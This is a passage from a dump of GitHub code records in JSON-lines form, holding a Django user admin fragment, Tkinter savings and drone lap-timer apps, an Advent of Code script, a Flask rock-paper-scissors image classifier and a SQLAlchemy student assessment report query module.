{'fields':(\n 'gender', 'city','country','date_of_birth',\n )\n }),\n )\n\n search_fields = ('email', 'phone_number')\n ordering = ['email']\n filter_horizontal = ()\n\n def get_inline_instances(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instances(request, obj)\n\nadmin.site.register(User, CustomUserAdmin)\n\n","repo_name":"inziani/UnoBackEnd","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41683813564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 12:00:54 2018\n\n@author: wegmarken\n\"\"\"\nimport tkinter as tk\nimport my_date_picker as mdp\nfrom datetime import datetime\nimport math\nimport configparser\n\ndef days_between(d1, d2):\n d1 = datetime.strptime(d1, \"%Y-%m-%d\")\n d2 = datetime.strptime(d2, \"%Y-%m-%d\")\n return abs((d2 - d1).days)\n\nclass Config:\n def __init__(self):\n filename = \"config.ini\"\n config = configparser.ConfigParser()\n rd = config.read(filename)\n if rd == []:\n config[\"DEFAULT\"] = {\"IniAmount\": \"1000\", \"MonthlyIncome\": \"100\"}\n with open(filename, 'w') as configfile:\n config.write(configfile)\n self.ini_amount = float(config[\"DEFAULT\"][\"IniAmount\"])\n self.monthly_income = float(config[\"DEFAULT\"][\"MonthlyIncome\"])\n\nclass MainGUI:\n def __init__(self, root):\n root = root\n root.title(\"Fin\")\n root.geometry(\"640x480\")\n\n self.mainframe = tk.Frame(root)\n self.mainframe.grid(column=0, row=0)\n self.mainframe.columnconfigure(0, weight=1)\n self.mainframe.rowconfigure(0, weight=1)\n\n def add_date_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n btn = tk.Button(self.mainframe, text=\"Date\", bg=\"white\", fg=\"blue\", command=lambda: mdp.MyDatePicker(entry))\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n btn.grid(column=col + 2, row=row)\n\n def add_result_field(self, row, col, func, var):\n btn = tk.Button(self.mainframe, text=\"Result\", bg=\"white\", fg=\"blue\", command=func)\n label = tk.Label(self.mainframe, textvariable=var)\n btn.grid(column=col, row=row)\n label.grid(column=col + 1, row=row)\n\n def add_num_entry_field(self, row, col, var, ltext):\n label = tk.Label(self.mainframe, text=ltext)\n entry = tk.Entry(self.mainframe, textvariable=var)\n label.grid(column=col, row=row)\n entry.grid(column=col + 1, row=row)\n\n\n\nroot = tk.Tk()\nm_gui = MainGUI(root)\n\nconfig = Config()\ntoday = datetime.today().strftime('%Y-%m-%d')\n\nstart_amount = tk.DoubleVar()\nstart_amount.set(config.ini_amount)\nm_gui.add_num_entry_field(row=1, col=1, var=start_amount, ltext=\"Start Amount\")\n\nstart_date = tk.StringVar()\nstart_date.set(today)\nm_gui.add_date_field(row=2, col=1, var=start_date, ltext=\"Start Date\")\n\nmonth_income = tk.DoubleVar()\nmonth_income.set(config.monthly_income)\nm_gui.add_num_entry_field(row=3, col=1, var=month_income, ltext=\"Monthly Income\")\n\nend_mi_date = tk.StringVar()\nend_mi_date.set(today)\nm_gui.add_date_field(row=4, col=1, var=end_mi_date, ltext=\"End In. Date\")\n\nend_date = tk.StringVar()\nend_date.set(today)\nm_gui.add_date_field(row=5, col=1, var=end_date, ltext=\"End Date\")\nres = tk.DoubleVar()\ndef fres():\n d1 = days_between(end_mi_date.get(), start_date.get())\n to_add = math.floor(d1/30)*month_income.get()\n res.set(start_amount.get() + to_add)\n\nm_gui.add_result_field(row=7, col=1, func=fres, var=res)\n\nroot.mainloop()\n\n\n\n\n","repo_name":"wegmarken2006/tk1","sub_path":"tk1_1.py","file_name":"tk1_1.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73764972328","text":"from tkinter import Tk, Label, Entry, Button, Toplevel, Scrollbar, Listbox, messagebox\r\nfrom PIL import Image, ImageTk\r\nimport io\r\nimport requests\r\nimport re\r\n\r\nclass LapTracker:\r\n def __init__(self, root):\r\n # Initialize the LapTracker class with a Tkinter root window\r\n self.root = root\r\n # Initialize empty list to store lap times for each racer\r\n self.lap_times = []\r\n # Initialize Toplevel window for displaying lap times and setting its value to None\r\n self.lap_time_window = None\r\n self.lap_time_display_window = None\r\n # Initialize list of racer names with empty strings\r\n self.racer_names = [\"\", \"\", \"\", \"\"]\r\n # Initialize lists to store racer name labels and entry widgets\r\n self.racer_labels = []\r\n self.racer_entries = []\r\n # Create racer name labels and entry widgets for each racer\r\n for i in range(4):\r\n racer_name_label = Label(root, text=f\"Racer {i+1} Name:\")\r\n racer_name_entry = Entry(root)\r\n racer_name_entry.insert(0, \"NAME\")\r\n racer_name_label.grid(row=i, column=0, padx=5, pady=5, sticky=\"W\")\r\n racer_name_entry.grid(row=i, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n\r\n lap_time_label = Label(root, text=f\"Racer {i+1} Lap Time:\")\r\n lap_time_entry = Entry(root)\r\n lap_time_entry.insert(0, \"01.00\")\r\n lap_time_label.grid(row=i+4, column=0, padx=5, pady=5, sticky=\"W\")\r\n lap_time_entry.grid(row=i+4, column=1, padx=5, pady=5, sticky=\"E\")\r\n self.racer_entries.append(lap_time_entry)\r\n\r\n # Create a lap time instruction label\r\n lap_time_instruction_label = Label(root, text=\"Edit the name and times (e.g. 23.456)\")\r\n lap_time_instruction_label.grid(row=4, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" Leave name and time alone if not in use\")\r\n lap_time_instruction_label.grid(row=5, column=2, padx=3, pady=3, sticky=\"W\")\r\n lap_time_instruction_label = Label(root, text=\" I want to say thanks to Ryan and Emily for their time and dedication to teaching programming\")\r\n lap_time_instruction_label.grid(row=6, column=2, padx=3, pady=3, sticky=\"W\")\r\n # Create a submit button to submit lap times\r\n self.submit_button = Button(root, text=\"Submit\", command=self.submit_lap_times)\r\n self.submit_button.grid(row=9, column=1, pady=5, sticky=\"E\")\r\n # Load an image from a URL using the requests and PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3T2QgC3/45.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(root, image=photo)\r\n label.image = photo\r\n label.grid(row=10, column=0, columnspan=2, padx=5, pady=5)\r\n\r\n # Create an exit button to close the application window\r\n exit_button = Button(root, text=\"Exit\", command=root.destroy)\r\n exit_button.grid(row=11, column=1, pady=5, sticky=\"E\")\r\n\r\n def is_valid_lap_time(self, lap_time):\r\n if lap_time == \"\":\r\n return False\r\n try:\r\n return float(lap_time) > 0\r\n except ValueError:\r\n return False\r\n def is_valid_name(self, name):\r\n # Check if name contains only letters\r\n return bool(re.match(\"^[a-zA-Z]*$\", name))\r\n def show_error_message(self, message):\r\n messagebox.showerror(\"Error\", message)\r\n def submit_lap_times(self):\r\n # Get racer names and lap times from the 
entry widgets and add them to the lap_times list\r\n lap_times = []\r\n for i in range(len(self.racer_entries)):\r\n if i % 2 == 0:\r\n racer_name = self.racer_entries[i].get()\r\n if not racer_name:\r\n # If racer name is empty, show an error message and return\r\n self.show_error_message(\"Racer name cannot be empty.\")\r\n return\r\n else:\r\n self.racer_names[i // 2] = racer_name\r\n else:\r\n lap_time = self.racer_entries[i].get()\r\n if not self.is_valid_lap_time(lap_time):\r\n # If lap time is invalid, show an error message and return\r\n self.show_error_message(\"Invalid lap time format. Lap time should be in the format mm:ss.ms (e.g. 23.456).\")\r\n return\r\n elif lap_time:\r\n lap_times.append((self.racer_names[i // 2], lap_time))\r\n # If the lap time display window has not been created, create it and display the lap times\r\n if self.lap_time_display_window is None:\r\n self.lap_time_display_window = Toplevel(self.root)\r\n self.lap_time_display_window.title(\"Lap Times\")\r\n self.lap_time_display_window.geometry(\"400x300\")\r\n # Load an image from a URL using the requests and PIL libraries and display it in a Label widget\r\n img_url = \"https://i.ibb.co/3mMYs96/69.png\"\r\n img_bytes = requests.get(img_url).content\r\n img = Image.open(io.BytesIO(img_bytes))\r\n img = img.resize((300, 200), Image.ANTIALIAS)\r\n photo = ImageTk.PhotoImage(img)\r\n label = Label(self.lap_time_display_window, image=photo)\r\n label.image = photo\r\n label.pack()\r\n \r\n scrollbar = Scrollbar(self.lap_time_display_window)\r\n scrollbar.pack(side=\"right\", fill=\"y\")\r\n self.lap_time_listbox = Listbox(self.lap_time_display_window, yscrollcommand=scrollbar.set)\r\n self.lap_time_listbox.pack(fill=\"both\", expand=True)\r\n scrollbar.config(command=self.lap_time_listbox.yview)\r\n \r\n copy_button = Button(self.lap_time_display_window, text=\"Copy to Clipboard\", command=lambda: self.copy_to_clipboard(lap_times))\r\n copy_button.pack()\r\n # Iterate over the lap times and add each one to the Listbox widget with alternating colors\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n color = \"blue\" if i % 2 == 0 else \"red\"\r\n self.lap_time_listbox.insert(\"end\", f\"{racer_name}: {lap_time}\")\r\n def copy_to_clipboard(self, lap_times):\r\n # Convert the lap times to a string with each lap time on a new line\r\n lap_times_string = \"\"\r\n for i, (racer_name, lap_time) in enumerate(lap_times):\r\n lap_times_string += f\"{racer_name}: {lap_time}\\n\"\r\n \r\n self.root.clipboard_clear()\r\n self.root.clipboard_append(lap_times_string)\r\n def add_racer(self):\r\n if len(self.racer_labels) < 4:\r\n # Add a new racer to the window with a name label and an entry field for their lap time\r\n racer_name_label = Label(self.root, text=\"Racer Name:\")\r\n racer_name_label.pack()\r\n racer_name_entry = Entry(self.root)\r\n racer_name_entry.pack()\r\n self.racer_names.append(\"\")\r\n self.racer_labels.append(racer_name_label)\r\n self.racer_entries.append(racer_name_entry)\r\n \r\n lap_time_label = Label(self.root, text=\"Enter Lap Time:\")\r\n lap_time_label.pack()\r\n lap_time_entry = Entry(self.root)\r\n lap_time_entry.pack()\r\n self.racer_entries.append(lap_time_entry)\r\n\r\nroot = Tk()\r\nroot.title(\"Drone Race Lap Tracker\")\r\nlap_tracker = 
LapTracker(root)\r\nroot.mainloop()","repo_name":"MasonLWest/FPV-Lap-Timer","sub_path":"FPVLapTrackerFina2l.py","file_name":"FPVLapTrackerFina2l.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72279981928","text":"inFile = open(\"input.txt\")\r\n\r\ncrc = 0\r\n\r\nfor l in inFile.readlines():\r\n inList = l.split('\\t')\r\n inList[-1] = inList[-1].rsplit('\\n')[0]\r\n inList = [ int(x) for x in inList]\r\n crc += max(inList) - min(inList)\r\n\r\nprint(crc)","repo_name":"Flourish3/AdventOfCode","sub_path":"2017/AOC/day2/day2_1.py","file_name":"day2_1.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35628881914","text":"from flask import Flask, render_template, request, url_for\nfrom functions import predict_winner\nfrom tensorflow.keras.models import model_from_json\nfrom tensorflow.keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\nimport os\nfrom werkzeug.utils import secure_filename\n\nUPLOAD_FOLDER = 'static/uploaded_images'\nALLOWED_EXTENSIONS = set(['png','jpg','jpeg','tiff'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n@app.route('/')\n@app.route('/home')\ndef home():\n return render_template('home.html')\n\n@app.route('/play')\n@app.route('/play', methods=['POST'])\n# Post method to run prediction model and return what each person/comp chose and who won\ndef play():\n try:\n model\n except:\n with open('model.json', 'r') as f:\n model = model_from_json(f.read())\n\n # Load in the model weights\n model.load_weights('20_epochs.h5')\n\n # Compile the model\n model.compile(loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy'])\n\n if(request.method == 'POST'):\n if 'file' not in request.files:\n return render_template('play.html', predict=None)\n file = request.files['file']\n if file.filename == '':\n return render_template('play.html', predict=None)\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n user_image = load_img(str(app.config['UPLOAD_FOLDER'] + '/' + filename), target_size = (150,150))\n user_image = img_to_array(user_image)\n user_image = np.expand_dims(user_image, axis = 0)\n \n os.remove(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n return render_template('play.html', predict=predict_winner(user_image, model))\n \n \n \n else:\n return render_template('play.html', predict=None)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\nif __name__ == '__main__':\n app.run()","repo_name":"Jordan-Ireland/CNN","sub_path":"flask_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33517869443","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Jan 13, 2013\n\n@author: tosako\n'''\nfrom string import capwords\nfrom sqlalchemy.sql.expression import and_, or_, null\nfrom edapi.decorators import report_config, user_info\nfrom smarter.reports.helpers.name_formatter import format_full_name\nfrom edapi.exceptions import NotFoundException\nfrom edapi.logging import audit_event\nfrom smarter.reports.helpers.breadcrumbs import get_breadcrumbs_context\nfrom smarter.reports.helpers.assessments import get_cut_points, \\\n get_overall_asmt_interval, get_claims, get_accommodations\nfrom smarter.security.context import select_with_context,\\\n get_current_request_context\nfrom smarter.reports.helpers.constants import Constants\nfrom smarter.reports.helpers.constants import AssessmentType\nfrom smarter.reports.helpers.metadata import get_custom_metadata, \\\n get_subjects_map\nfrom edcore.database.edcore_connector import EdCoreDBConnection\nfrom smarter.reports.student_administration import get_asmt_administration_years_isr\nfrom smarter.security.tenant import validate_user_tenant\nfrom smarter_common.security.constants import RolesConstants\nimport logging\nfrom sqlalchemy.sql.functions import func\n\n\nlogger = logging.getLogger('smarter')\n\n\nREPORT_NAME = 'individual_student_report'\n\n\ndef __prepare_query(connector, params):\n '''\n Returns query for individual student report\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n date_taken = params.get(Constants.DATETAKEN)\n asmt_type = params.get(Constants.ASMTTYPE)\n asmt_year = params.get(Constants.ASMTYEAR)\n\n fact_asmt_outcome_vw = connector.get_table('fact_asmt_outcome_vw')\n dim_student = connector.get_table('dim_student')\n dim_asmt = connector.get_table('dim_asmt')\n query = select_with_context([\n fact_asmt_outcome_vw.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_asmt_outcome_vw.c.enrl_grade.label('grade'),\n fact_asmt_outcome_vw.c.district_id.label('district_id'),\n fact_asmt_outcome_vw.c.school_id.label('school_id'),\n fact_asmt_outcome_vw.c.state_code.label('state_code'),\n fact_asmt_outcome_vw.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n 
dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n fact_asmt_outcome_vw.c.asmt_grade.label('asmt_grade'),\n fact_asmt_outcome_vw.c.asmt_score.label('asmt_score'),\n fact_asmt_outcome_vw.c.asmt_score_range_min.label('asmt_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_score_range_max.label('asmt_score_range_max'),\n fact_asmt_outcome_vw.c.date_taken_day.label('date_taken_day'),\n fact_asmt_outcome_vw.c.date_taken_month.label('date_taken_month'),\n fact_asmt_outcome_vw.c.date_taken_year.label('date_taken_year'),\n fact_asmt_outcome_vw.c.asmt_perf_lvl.label('asmt_perf_lvl'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score.label('asmt_claim_2_score'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score.label('asmt_claim_3_score'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score.label('asmt_claim_4_score'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_min.label('asmt_claim_2_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_min.label('asmt_claim_3_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_min.label('asmt_claim_4_score_range_min'),\n fact_asmt_outcome_vw.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_2_score_range_max.label('asmt_claim_2_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_3_score_range_max.label('asmt_claim_3_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_4_score_range_max.label('asmt_claim_4_score_range_max'),\n fact_asmt_outcome_vw.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_2_perf_lvl.label('asmt_claim_2_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_3_perf_lvl.label('asmt_claim_3_perf_lvl'),\n fact_asmt_outcome_vw.c.asmt_claim_4_perf_lvl.label('asmt_claim_4_perf_lvl'),\n fact_asmt_outcome_vw.c.acc_asl_video_embed.label('acc_asl_video_embed'),\n fact_asmt_outcome_vw.c.acc_noise_buffer_nonembed.label('acc_noise_buffer_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_items_nonembed.label('acc_print_on_demand_items_nonembed'),\n 
fact_asmt_outcome_vw.c.acc_braile_embed.label('acc_braile_embed'),\n fact_asmt_outcome_vw.c.acc_closed_captioning_embed.label('acc_closed_captioning_embed'),\n fact_asmt_outcome_vw.c.acc_text_to_speech_embed.label('acc_text_to_speech_embed'),\n fact_asmt_outcome_vw.c.acc_abacus_nonembed.label('acc_abacus_nonembed'),\n fact_asmt_outcome_vw.c.acc_alternate_response_options_nonembed.label('acc_alternate_response_options_nonembed'),\n fact_asmt_outcome_vw.c.acc_calculator_nonembed.label('acc_calculator_nonembed'),\n fact_asmt_outcome_vw.c.acc_multiplication_table_nonembed.label('acc_multiplication_table_nonembed'),\n fact_asmt_outcome_vw.c.acc_print_on_demand_nonembed.label('acc_print_on_demand_nonembed'),\n fact_asmt_outcome_vw.c.acc_read_aloud_nonembed.label('acc_read_aloud_nonembed'),\n fact_asmt_outcome_vw.c.acc_scribe_nonembed.label('acc_scribe_nonembed'),\n fact_asmt_outcome_vw.c.acc_speech_to_text_nonembed.label('acc_speech_to_text_nonembed'),\n fact_asmt_outcome_vw.c.acc_streamline_mode.label('acc_streamline_mode'),\n fact_asmt_outcome_vw.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_asmt_outcome_vw.c.complete, True).label('complete')\n ], from_obj=[\n fact_asmt_outcome_vw\n .join(dim_student, and_(fact_asmt_outcome_vw.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_asmt_outcome_vw.c.asmt_rec_id))\n ], permission=RolesConstants.PII, state_code=state_code)\n query = query\\\n .where(\n and_(\n fact_asmt_outcome_vw.c.student_id == student_id,\n fact_asmt_outcome_vw.c.rec_status == Constants.CURRENT))\n query = query\\\n .where(and_(\n or_(and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.SUMMATIVE]),\n (or_(fact_asmt_outcome_vw.c.administration_condition == Constants.ADMINISTRATION_CONDITION_INVALID, fact_asmt_outcome_vw.c.administration_condition == null()))),\n and_(fact_asmt_outcome_vw.c.asmt_type.in_([AssessmentType.INTERIM_COMPREHENSIVE])),\n (or_(fact_asmt_outcome_vw.c.administration_condition == null(),\n fact_asmt_outcome_vw.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED, Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))))\n\n if assessment_guid is not None:\n query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n if date_taken is not None:\n query = query.where(fact_asmt_outcome_vw.c.date_taken == str(date_taken))\n if asmt_type is not None:\n query = query.where(dim_asmt.c.asmt_type == asmt_type)\n if asmt_year is not None:\n query = query.where(fact_asmt_outcome_vw.c.asmt_year == asmt_year)\n query = query.order_by(dim_asmt.c.asmt_subject.desc(), dim_asmt.c.asmt_period_year.desc())\n return query\n\n\ndef __prepare_query_iab(connector, params):\n '''\n Returns query for individual student report for IAB\n '''\n assessment_guid = params.get(Constants.ASSESSMENTGUID)\n asmt_year = params.get(Constants.ASMTYEAR)\n student_id = params.get(Constants.STUDENTGUID)\n state_code = params.get(Constants.STATECODE)\n\n fact_block_asmt_outcome = connector.get_table(Constants.FACT_BLOCK_ASMT_OUTCOME)\n dim_student = connector.get_table(Constants.DIM_STUDENT)\n dim_asmt = connector.get_table(Constants.DIM_ASMT)\n query = select_with_context([fact_block_asmt_outcome.c.student_id,\n dim_student.c.first_name.label('first_name'),\n dim_student.c.middle_name.label('middle_name'),\n dim_student.c.last_name.label('last_name'),\n fact_block_asmt_outcome.c.enrl_grade.label('enrl_grade'),\n fact_block_asmt_outcome.c.district_id.label('district_id'),\n 
fact_block_asmt_outcome.c.school_id.label('school_id'),\n fact_block_asmt_outcome.c.state_code.label('state_code'),\n dim_asmt.c.asmt_subject.label('asmt_subject'),\n dim_asmt.c.asmt_period.label('asmt_period'),\n dim_asmt.c.asmt_period_year.label('asmt_period_year'),\n fact_block_asmt_outcome.c.date_taken.label('date_taken'),\n dim_asmt.c.asmt_type.label('asmt_type'),\n dim_asmt.c.asmt_score_min.label('asmt_score_min'),\n dim_asmt.c.asmt_score_max.label('asmt_score_max'),\n dim_asmt.c.asmt_perf_lvl_name_1.label(\"asmt_cut_point_name_1\"),\n dim_asmt.c.asmt_perf_lvl_name_2.label(\"asmt_cut_point_name_2\"),\n dim_asmt.c.asmt_perf_lvl_name_3.label(\"asmt_cut_point_name_3\"),\n dim_asmt.c.asmt_perf_lvl_name_4.label(\"asmt_cut_point_name_4\"),\n dim_asmt.c.asmt_perf_lvl_name_5.label(\"asmt_cut_point_name_5\"),\n dim_asmt.c.asmt_cut_point_1.label(\"asmt_cut_point_1\"),\n dim_asmt.c.asmt_cut_point_2.label(\"asmt_cut_point_2\"),\n dim_asmt.c.asmt_cut_point_3.label(\"asmt_cut_point_3\"),\n dim_asmt.c.asmt_cut_point_4.label(\"asmt_cut_point_4\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_1.label(\"asmt_claim_perf_lvl_name_1\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_2.label(\"asmt_claim_perf_lvl_name_2\"),\n dim_asmt.c.asmt_claim_perf_lvl_name_3.label(\"asmt_claim_perf_lvl_name_3\"),\n fact_block_asmt_outcome.c.asmt_grade.label('asmt_grade'),\n fact_block_asmt_outcome.c.date_taken_day.label('date_taken_day'),\n fact_block_asmt_outcome.c.date_taken_month.label('date_taken_month'),\n fact_block_asmt_outcome.c.date_taken_year.label('date_taken_year'),\n dim_asmt.c.asmt_claim_1_name.label('asmt_claim_1_name'),\n dim_asmt.c.asmt_claim_2_name.label('asmt_claim_2_name'),\n dim_asmt.c.asmt_claim_3_name.label('asmt_claim_3_name'),\n dim_asmt.c.asmt_claim_4_name.label('asmt_claim_4_name'),\n dim_asmt.c.asmt_claim_1_score_min.label('asmt_claim_1_score_min'),\n dim_asmt.c.asmt_claim_2_score_min.label('asmt_claim_2_score_min'),\n dim_asmt.c.asmt_claim_3_score_min.label('asmt_claim_3_score_min'),\n dim_asmt.c.asmt_claim_4_score_min.label('asmt_claim_4_score_min'),\n dim_asmt.c.asmt_claim_1_score_max.label('asmt_claim_1_score_max'),\n dim_asmt.c.asmt_claim_2_score_max.label('asmt_claim_2_score_max'),\n dim_asmt.c.asmt_claim_3_score_max.label('asmt_claim_3_score_max'),\n dim_asmt.c.asmt_claim_4_score_max.label('asmt_claim_4_score_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_score.label('asmt_claim_1_score'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_min.label('asmt_claim_1_score_range_min'),\n fact_block_asmt_outcome.c.asmt_claim_1_score_range_max.label('asmt_claim_1_score_range_max'),\n fact_block_asmt_outcome.c.asmt_claim_1_perf_lvl.label('asmt_claim_1_perf_lvl'),\n fact_block_asmt_outcome.c.administration_condition.label('administration_condition'),\n func.coalesce(fact_block_asmt_outcome.c.complete, True).label('complete')],\n from_obj=[fact_block_asmt_outcome\n .join(dim_student, and_(fact_block_asmt_outcome.c.student_rec_id == dim_student.c.student_rec_id))\n .join(dim_asmt, and_(dim_asmt.c.asmt_rec_id == fact_block_asmt_outcome.c.asmt_rec_id))], permission=RolesConstants.PII, state_code=state_code)\n query = query.where(and_(fact_block_asmt_outcome.c.student_id == student_id, fact_block_asmt_outcome.c.rec_status == Constants.CURRENT, dim_asmt.c.asmt_type == AssessmentType.INTERIM_ASSESSMENT_BLOCKS))\n query = query.where(and_(or_(fact_block_asmt_outcome.c.administration_condition == null(), fact_block_asmt_outcome.c.administration_condition.in_([Constants.ADMINISTRATION_CONDITION_STANDARDIZED,\n 
Constants.ADMINISTRATION_CONDITION_NON_STANDARDIZED]))))\n    if assessment_guid is not None:\n        query = query.where(dim_asmt.c.asmt_guid == assessment_guid)\n    if asmt_year is not None:\n        query = query.where(fact_block_asmt_outcome.c.asmt_year == asmt_year)\n    query = query.order_by(dim_asmt.c.asmt_subject.desc(), fact_block_asmt_outcome.c.asmt_grade.desc(), fact_block_asmt_outcome.c.date_taken.desc())\n    return query\n\n\ndef __calculateClaimScoreRelativeDifference(item):\n    '''\n    calculate relative difference for each claim\n    1. find absolute max claim score\n    2. calculate relative difference\n    '''\n    newItem = item.copy()\n    asmt_score = newItem['asmt_score']\n    claims = newItem['claims']\n    maxAbsDiffScore = 0\n    for claim in claims:\n        score = int(claim['score'])\n        # keep track max score difference\n        if maxAbsDiffScore < abs(asmt_score - score):\n            maxAbsDiffScore = abs(asmt_score - score)\n    for claim in claims:\n        score = int(claim['score'])\n        if maxAbsDiffScore == 0:\n            claim['claim_score_relative_difference'] = 0\n        else:\n            claim['claim_score_relative_difference'] = int((score - asmt_score) / maxAbsDiffScore * 100)\n    return newItem\n\n\ndef __arrange_results(results, subjects_map, custom_metadata_map):\n    '''\n    This method arranges the data retrieved from the db to make it easier to consume by the client\n    '''\n    new_results = []\n    for result in results:\n\n        result['student_full_name'] = format_full_name(result['first_name'], result['middle_name'], result['last_name'])\n        # asmt_type is an enum, so we need to capitalize it to make it presentable\n        result['asmt_type'] = capwords(result['asmt_type'], ' ')\n        result['asmt_score_interval'] = get_overall_asmt_interval(result)\n\n        # custom metadata\n        subject_name = subjects_map[result[\"asmt_subject\"]]\n        custom 